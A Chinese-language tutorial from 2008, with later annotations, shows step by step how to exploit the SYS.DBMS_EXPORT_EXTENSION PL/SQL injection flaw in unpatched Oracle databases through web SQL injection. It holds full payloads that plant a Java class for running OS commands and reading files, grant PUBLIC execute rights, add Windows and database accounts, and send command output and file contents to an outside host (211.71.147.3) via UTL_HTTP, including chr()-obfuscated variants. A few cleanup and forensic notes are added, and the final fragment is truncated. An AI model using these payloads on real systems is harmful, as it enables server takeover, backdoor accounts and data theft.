
实例演示oracle注入获取cmdshell的全过程

以下的演示都是在web上的sql plus执行的,在web注入时 把 select SYS.DBMS_EXPORT_EXTENSION..... 改成

/xxx.jsp?id=1 and '1'<>'a'||(select SYS.DBMS_EXPORT_EXTENSION.....)

的形式即可。(用 " 'a'|| " 是为了让语句返回true值)
语句有点长,可能要用post提交。
注意:整个方法依赖 SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES 中的 PL/SQL 注入缺陷——该过程由 SYS 拥有、以定义者权限运行,且 PUBLIC 可以执行,所以拼进第三个参数里的语句是以 SYS 身份执行的。Oracle 已在 2006 年的 Critical Patch Update 中修补了这个缺陷,以下步骤只对未打补丁的实例有效。
以下是各个步骤:
1.创建包
通过注入 SYS.DBMS_EXPORT_EXTENSION 函数,在oracle上创建Java包LinxUtil,里面两个函数,runCMD用于执行系统命令,readFile用于读取文件。注意 runCMD 只读取子进程的标准输出(getInputStream),标准错误被丢弃,命令出错时返回可能为空;若命令向标准错误写入大量内容,子进程也可能因缓冲区填满而阻塞。
/xxx.jsp?id=1 and '1'<>'a'||(
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
create or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(
new InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}public static String readFile(String filename){try{BufferedReader myReader= new BufferedReader(new FileReader(filename)); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}
}'''';END;'';END;--','SYS',0,'1',0) from dual
)
------------------------
如果url有长度限制,可以把readFile()函数块去掉,即:
/xxx.jsp?id=1 and '1'<>'a'||(
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
create or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(
new InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}
}'''';END;'';END;--','SYS',0,'1',0) from dual
)
同时把后面步骤提到的对readFile()的处理语句(第3步的 LinxReadFile 函数、第4步对它的授权、第6步读文件的示例)去掉。
------------------------------
2.赋Java权限
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''begin dbms_java.grant_permission( ''''''''PUBLIC'''''''', ''''''''SYS:java.io.FilePermission'''''''', ''''''''<<ALL FILES>>'''''''', ''''''''execute'''''''' );end;'''';END;'';END;--','SYS',0,'1',0) from dual
注意:这一步把 java.io.FilePermission <<ALL FILES>> execute 授予了 PUBLIC,也就是库里任何账号都能通过 Java 执行任意操作系统程序;该授权会持久记录在 DBA_JAVA_POLICY 视图中,是排查和清理时必须检查的地方。这里只授予了 execute,readFile 读文件如果因权限失败,可能还需要 read 权限——需在目标上确认。
3.创建函数
(上面的语句都以 SYS 身份执行,所以 Java 源和下面的两个函数都创建在 SYS 模式下,后面要写成 sys.LinxRunCMD / sys.LinxReadFile 来调用。)
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
create or replace function LinxRunCMD(p_cmd in varchar2)  return varchar2  as language java name ''''''''LinxUtil.runCMD(java.lang.String) return String'''''''';   '''';END;'';END;--','SYS',0,'1',0) from dual
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
create or replace function LinxReadFile(filename in varchar2)  return varchar2  as language java name ''''''''LinxUtil.readFile(java.lang.String) return String'''''''';   '''';END;'';END;--','SYS',0,'1',0) from dual
4.赋public执行函数的权限
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on LinxRunCMD to public'''';END;'';END;--','SYS',0,'1',0) from dual
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on LinxReadFile to public'''';END;'';END;--','SYS',0,'1',0) from dual
(这一步让任何数据库账号都能调用这两个函数,等于给全库开了一个以函数所有者 SYS 的权限执行命令、读文件的入口;调用函数实际只需要 execute 权限,grant all 只是写起来省事。)
5.测试上面的几步是否成功
(创建函数时没有给名字加引号,Oracle 会把标识符转成大写,所以在 all_objects 里要按 'LINXRUNCMD' / 'LINXREADFILE' 查。)
and '1'<>'11'||(
select  OBJECT_ID from all_objects where  object_name ='LINXRUNCMD'
)
and '1'<>(
select  OBJECT_ID from all_objects where  object_name ='LINXREADFILE'
)
6.执行命令:
/xxx.jsp?id=1 and '1'<>(
select  sys.LinxRunCMD('cmd /c net user linx /add') from dual
)
/xxx.jsp?id=1 and '1'<>(
select  sys.LinxReadFile('c:/boot.ini') from dual
)

注意sys.LinxReadFile()返回的是varchar类型,不能用"and 1<>" 代替 "and '1'<>"。两个函数都声明为返回 varchar2,命令输出或文件内容超过 4000 字节时在 SQL 里可能直接报错,读大文件前要有预期。
示例命令是 Windows 的(cmd /c、c:/boot.ini),目标为其他系统时需相应改写;新增系统账号会留下明显痕迹,测试完要记得删掉。
如果要查看运行结果可以用 union :
/xxx.jsp?id=1 union select  sys.LinxRunCMD('cmd /c net user linx /add') from dual
或者用 UTL_HTTP.request() 把结果带到自己控制的服务器上。下面的 211.71.147.3 是原作者的接收端,使用时要换成自己的主机;这要求数据库服务器能向外发起 HTTP 请求,11g 及以上版本还需要有对应的网络 ACL,否则 UTL_HTTP 会直接报错:
/xxx.jsp?id=1 and '1'<>(
SELECT UTL_HTTP.request('http://211.71.147.3/record.php?a=LinxRunCMD:'||REPLACE(REPLACE(sys.LinxRunCMD('cmd /c net user aaa /del'),' ','%20'),chr(10),'%0A')) FROM dual
)
/xxx.jsp?id=1 and '1'<>(
SELECT UTL_HTTP.request('http://211.71.147.3/record.php?a=LinxReadFile:'||REPLACE(REPLACE(sys.LinxReadFile('c:/boot.ini'),' ','%20'),chr(10),'%0A')) FROM dual
)
注意:用UTL_HTTP.request时,要用 REPLACE() 把空格、换行符给替换掉,否则会无法提交http request。换行符要写成 chr(10):Oracle 的字符串字面量不处理转义序列,'\n' 只是反斜杠和字母 n 两个字符,替换不到 Java 代码里 "\n" 产生的真正换行。用 utl_encode.base64_encode 也可以,但它的输入输出都是 RAW,要写成 utl_raw.cast_to_varchar2(utl_encode.base64_encode(utl_raw.cast_to_raw(...))),而且输出里的 +、/、= 以及可能插入的换行同样需要处理后才能放进 URL。
--------------------
7.内部变化
通过以下命令可以查看all_objects表的改变:
select  * from all_objects where  object_name like '%LINX%' or  object_name like '%Linx%'
8.删除我们创建的函数
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
drop function LinxRunCMD  '''';END;'';END;--','SYS',0,'1',0) from dual
只删 LinxRunCMD 并不算清理完毕:LinxReadFile 函数、Java 源 "LinxUtil" 以及第2步授予 PUBLIC 的 java.io.FilePermission 都还留在库里。应同样用上面的方式执行 drop function LinxReadFile、drop java source "LinxUtil",并用 dbms_java.revoke_permission 收回授权;做应急响应时,DBA_OBJECTS 里的这些对象和 DBA_JAVA_POLICY 里的授权记录就是这类攻击留下的主要痕迹。
====================================================
全文结束。谨以此文赠与我的朋友。
linx
124829445
2008.1.12
linyujian@bjfu.edu.cn
======================================================================
测试漏洞的另一方法:
创建oracle帐号:
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
CREATE USER linxsql IDENTIFIED BY linxsql'''';END;'';END;--','SYS',0,'1',0) from dual
即(把参数全部用 chr() 拼出来,语句里就不再出现引号;注意此时第三个参数不在字符串字面量里,所以内部的引号比上面少一层):
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES(chr(70)||chr(79)||chr(79),chr(66)||chr(65)||chr(82),
chr(68)||chr(66)||chr(77)||chr(83)||chr(95)||chr(79)||chr(85)||chr(84)||chr(80)||chr(85)||chr(84)||chr(34)||chr(46)||chr(80)||chr(85)||chr(84)||chr(40)||chr(58)||chr(80)||chr(49)||chr(41)||chr(59)||chr(69)||chr(88)||chr(69)||chr(67)||chr(85)||chr(84)||chr(69)||chr(32)||chr(73)||chr(77)||chr(77)||chr(69)||chr(68)||chr(73)||chr(65)||chr(84)||chr(69)||chr(32)||chr(39)||chr(68)||chr(69)||chr(67)||chr(76)||chr(65)||chr(82)||chr(69)||chr(32)||chr(80)||chr(82)||chr(65)||chr(71)||chr(77)||chr(65)||chr(32)||chr(65)||chr(85)||chr(84)||chr(79)||chr(78)||chr(79)||chr(77)||chr(79)||chr(85)||chr(83)||chr(95)||chr(84)||chr(82)||chr(65)||chr(78)||chr(83)||chr(65)||chr(67)||chr(84)||chr(73)||chr(79)||chr(78)||chr(59)||chr(66)||chr(69)||chr(71)||chr(73)||chr(78)||chr(32)||chr(69)||chr(88)||chr(69)||chr(67)||chr(85)||chr(84)||chr(69)||chr(32)||chr(73)||chr(77)||chr(77)||chr(69)||chr(68)||chr(73)||chr(65)||chr(84)||chr(69)||chr(32)||chr(39)||chr(39)||chr(67)||chr(82)||chr(69)||chr(65)||chr(84)||chr(69)||chr(32)||chr(85)||chr(83)||chr(69)||chr(82)||chr(32)||chr(108)||chr(105)||chr(110)||chr(120)||chr(115)||chr(113)||chr(108)||chr(32)||chr(73)||chr(68)||chr(69)||chr(78)||chr(84)||chr(73)||chr(70)||chr(73)||chr(69)||chr(68)||chr(32)||chr(66)||chr(89)||chr(32)||chr(108)||chr(105)||chr(110)||chr(120)||chr(115)||chr(113)||chr(108)||chr(39)||chr(39)||chr(59)||chr(69)||chr(78)||chr(68)||chr(59)||chr(39)||chr(59)||chr(69)||chr(78)||chr(68)||chr(59)||chr(45)||chr(45),chr(83)||chr(89)||chr(83),0,chr(49),0) from dual
确定漏洞存在:
1<>(
select user_id from all_users where username='LINXSQL'
)
给linxsql连接权限:
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
GRANT CONNECT TO linxsql'''';END;'';END;--','SYS',0,'1',0) from dual
删除帐号:
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
drop user LINXSQL'''';END;'';END;--','SYS',0,'1',0) from dual
注意:这种测试方式会在目标库里留下一个口令与用户名相同的账号(linxsql/linxsql),测试完必须执行上面的 drop user,否则它本身就成了任何人都能用的后门;DBA_USERS 里多出的这类账号也是排查时的一个明显线索。
======================
以下方法创建一个可以执行多语句的函数Linx_query(),执行成功的话返回数值"1"。但它声明为 authid current_user(调用者权限),里面的 execute immediate 以调用者而不是 SYS 的权限运行,而注入点使用的数据库账号可能只有 public 级别的权限,所以作用似乎不大;真的要用的话可以考虑先用上面的方式 grant dba 给当前的 User:
1.jsp?id=1 and '1'<>(
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
create or replace function Linx_query (p varchar2) return number authid current_user is begin execute immediate p; return 1;  end;   '''';END;'';END;--','SYS',0,'1',0) from dual
)
(以下片段在原帖中即已残缺,此处未作补全:)
and ... 1.jsp?id=1 and '1'( select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT.PUT(:P1);EXECUTE IMMEDIATE
)